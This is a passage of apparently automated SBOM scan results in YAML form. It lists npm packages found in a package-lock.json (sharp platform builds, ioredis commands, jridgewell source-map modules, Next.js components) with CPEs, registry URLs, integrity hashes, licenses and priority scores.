cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-linuxmusl-x64@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-linuxmusl-x64/-/sharp-linuxmusl-x64-0.34.5.tgz integrity: sha512-Jg8wNT1MUzIvhBFxViqrEhWDGzqymo3sV7z7ZsaWbZNDLXRJZoRGrjulp60YYtV4wfY8VIKcWidjojlLcWrd8Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 34c9f7634c9fe393 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-wasm32 0.34.5' title: '@img/sharp-wasm32 0.34.5' description: 'Package discovered: @img/sharp-wasm32 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ef4974ec29f2dcac name: '@img/sharp-wasm32' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 AND LGPL-3.0-or-later AND MIT spdxExpression: Apache-2.0 AND LGPL-3.0-or-later AND MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-wasm32:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-wasm32:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_wasm32:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_wasm32:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-wasm32@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-wasm32/-/sharp-wasm32-0.34.5.tgz integrity: sha512-OdWTEiVkY2PHwqkbBI8frFxQQFekHaSSkUIJkwzclWZe64O1X4UlUjqqqLaPbUpMOQk6FBu/HtlGXNblIs0huw== dependencies: '@emnapi/runtime': ^1.7.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 866d76b99aec49d7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-win32-arm64 0.34.5' title: '@img/sharp-win32-arm64 0.34.5' description: 'Package discovered: @img/sharp-win32-arm64 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b108eb8ed0a59806 name: '@img/sharp-win32-arm64' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 AND LGPL-3.0-or-later spdxExpression: Apache-2.0 AND LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-win32-arm64:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-win32-arm64:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32_arm64:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32_arm64:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-win32-arm64@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-win32-arm64/-/sharp-win32-arm64-0.34.5.tgz integrity: sha512-WQ3AgWCWYSb2yt+IG8mnC6Jdk9Whs7O0gxphblsLvdhSpSTtmu69ZG1Gkb6NuvxsNACwiPV6cNSZNzt0KPsw7g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 574980068e294acc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-win32-ia32 0.34.5' title: '@img/sharp-win32-ia32 0.34.5' description: 'Package discovered: @img/sharp-win32-ia32 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8da96e6bc654731f name: '@img/sharp-win32-ia32' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 AND LGPL-3.0-or-later spdxExpression: Apache-2.0 AND LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-win32-ia32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-win32-ia32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32_ia32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32_ia32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-win32-ia32@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-win32-ia32/-/sharp-win32-ia32-0.34.5.tgz integrity: sha512-FV9m/7NmeCmSHDD5j4+4pNI8Cp3aW+JvLoXcTUo0IqyjSfAZJ8dIUmijx1qaJsIiU+Hosw6xM5KijAWRJCSgNg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ab5d55aa7d2a17c8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-win32-x64 0.34.5' title: '@img/sharp-win32-x64 0.34.5' description: 'Package discovered: @img/sharp-win32-x64 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e8052476c35410ff name: '@img/sharp-win32-x64' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 AND LGPL-3.0-or-later spdxExpression: Apache-2.0 AND LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-win32-x64:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-win32-x64:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32_x64:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32_x64:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-win32-x64@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-win32-x64/-/sharp-win32-x64-0.34.5.tgz integrity: sha512-+29YMsqY2/9eFEiW93eqWnuLcWcufowXewwSNIT6UwZdUUCrM3oFjMWH/Z6/TMmb4hlFenmfAVbpWeup2jryCw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ab76bfe90efb399f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @ioredis/commands 1.5.1' title: '@ioredis/commands 1.5.1' description: 'Package discovered: @ioredis/commands 1.5.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 58cb7ee4da366532 name: '@ioredis/commands' version: 1.5.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@ioredis\/commands:\@ioredis\/commands:1.5.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40ioredis/commands@1.5.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@ioredis/commands/-/commands-1.5.1.tgz integrity: sha512-JH8ZL/ywcJyR9MmJ5BNqZllXNZQqQbnVZOqpPQqE1vHiFgAw4NHbvE0FOduNU8IX9babitBT46571OnPTT0Zcw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2bd603d91182e49c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @isaacs/cliui 8.0.2' title: '@isaacs/cliui 8.0.2' description: 'Package discovered: @isaacs/cliui 8.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1157d16cad8b2ffc name: '@isaacs/cliui' version: 8.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@isaacs\/cliui:\@isaacs\/cliui:8.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40isaacs/cliui@8.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz integrity: sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA== dependencies: string-width: ^5.1.2 string-width-cjs: npm:string-width@^4.2.0 strip-ansi: ^7.0.1 strip-ansi-cjs: npm:strip-ansi@^6.0.1 wrap-ansi: ^8.1.0 wrap-ansi-cjs: npm:wrap-ansi@^7.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5c9bb2e998c9fa3b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @jridgewell/gen-mapping 0.3.13' title: '@jridgewell/gen-mapping 0.3.13' description: 'Package discovered: @jridgewell/gen-mapping 0.3.13' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 93582717df76767f name: '@jridgewell/gen-mapping' version: 0.3.13 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@jridgewell\/gen-mapping:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/gen-mapping:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/gen_mapping:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/gen_mapping:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/gen:\@jridgewell\/gen-mapping:0.3.13:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/gen:\@jridgewell\/gen_mapping:0.3.13:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40jridgewell/gen-mapping@0.3.13 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz integrity: sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA== dependencies: '@jridgewell/sourcemap-codec': ^1.5.0 '@jridgewell/trace-mapping': ^0.3.24 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 843924b3be64bc5f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @jridgewell/resolve-uri 3.1.2' title: '@jridgewell/resolve-uri 3.1.2' description: 'Package discovered: @jridgewell/resolve-uri 3.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 82452eb5459f3fba name: '@jridgewell/resolve-uri' version: 3.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@jridgewell\/resolve-uri:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/resolve-uri:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/resolve_uri:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/resolve_uri:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/resolve:\@jridgewell\/resolve-uri:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/resolve:\@jridgewell\/resolve_uri:3.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40jridgewell/resolve-uri@3.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz integrity: sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c541a28057efb07d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @jridgewell/sourcemap-codec 1.5.5' title: '@jridgewell/sourcemap-codec 1.5.5' description: 'Package discovered: @jridgewell/sourcemap-codec 1.5.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 47804e8101ff9015 name: '@jridgewell/sourcemap-codec' version: 1.5.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@jridgewell\/sourcemap-codec:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/sourcemap-codec:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/sourcemap_codec:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/sourcemap_codec:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/sourcemap:\@jridgewell\/sourcemap-codec:1.5.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/sourcemap:\@jridgewell\/sourcemap_codec:1.5.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40jridgewell/sourcemap-codec@1.5.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz integrity: sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 17f518740ec1a2d8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @jridgewell/trace-mapping 0.3.31' title: '@jridgewell/trace-mapping 0.3.31' description: 'Package discovered: @jridgewell/trace-mapping 0.3.31' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d2b0bb94bbc32d3e name: '@jridgewell/trace-mapping' version: 0.3.31 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@jridgewell\/trace-mapping:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/trace-mapping:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/trace_mapping:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/trace_mapping:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/trace:\@jridgewell\/trace-mapping:0.3.31:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@jridgewell\/trace:\@jridgewell\/trace_mapping:0.3.31:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40jridgewell/trace-mapping@0.3.31 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.31.tgz integrity: sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw== dependencies: '@jridgewell/resolve-uri': ^3.1.0 '@jridgewell/sourcemap-codec': ^1.4.14 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 104bcdf3fd6a7ac2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @js-sdsl/ordered-map 4.4.2' title: '@js-sdsl/ordered-map 4.4.2' description: 'Package discovered: @js-sdsl/ordered-map 4.4.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 886fcbec7936d83f name: '@js-sdsl/ordered-map' version: 4.4.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@js-sdsl\/ordered-map:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@js-sdsl\/ordered-map:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@js_sdsl\/ordered_map:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@js_sdsl\/ordered_map:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@js-sdsl\/ordered:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@js-sdsl\/ordered:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@js_sdsl\/ordered:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@js_sdsl\/ordered:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@js:\@js-sdsl\/ordered-map:4.4.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@js:\@js_sdsl\/ordered_map:4.4.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40js-sdsl/ordered-map@4.4.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz integrity: sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9fea893a2745b477 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @next/env 14.2.3' title: '@next/env 14.2.3' description: 'Package discovered: @next/env 14.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 18ad44792e37660e name: '@next/env' version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@next\/env:\@next\/env:14.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40next/env@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@next/env/-/env-14.2.3.tgz integrity: sha512-W7fd7IbkfmeeY2gXrzJYDx8D2lWKbVoTIj1o1ScPHNzvp30s1AuoEFSdr39bC5sjxJaxTtq3OTCZboNp0lNWHA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 258c6f6b4bc11247 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @next/swc-darwin-arm64 14.2.3' title: '@next/swc-darwin-arm64 14.2.3' description: 'Package discovered: @next/swc-darwin-arm64 14.2.3' 